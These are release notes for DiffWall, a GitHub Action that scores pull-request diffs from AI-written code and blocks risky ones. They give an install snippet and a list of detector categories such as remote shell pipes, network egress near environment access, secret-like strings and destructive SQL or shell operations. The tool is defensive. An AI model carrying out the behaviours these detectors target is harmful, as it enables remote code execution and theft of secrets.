v0.1.1 — Action-first MVP update
First update runnable release of DiffWall: a deterministic PR risk firewall for agent-written code.
What’s included
- GitHub Action wrapper:
dburt-proex/diffwall/action@v0.1.0 - Deterministic diff scanner
- ALLOW / REVIEW / HALT routing model
- Rule-based risk scoring
- Markdown and JSON report output
- Default policy file:
rules/default.yml - CI workflow for install, build, test, and demo scan
Risk detectors included
- Protected path changes
- GitHub workflow changes
- Auth/security/billing path changes
- Secret-like strings
- Dependency manifest changes
- Package install scripts
- Destructive SQL and shell operations
- TLS verification disablement
- Remote shell pipes
- Network egress near environment access
- Large diffs
- Source changes without tests
Install
- name: Run DiffWall
uses: dburt-proex/diffwall/action@v0.1.0
with:
base: origin/${{ github.base_ref }}
head: HEAD
config: rules/default.yml
fail-on-halt: true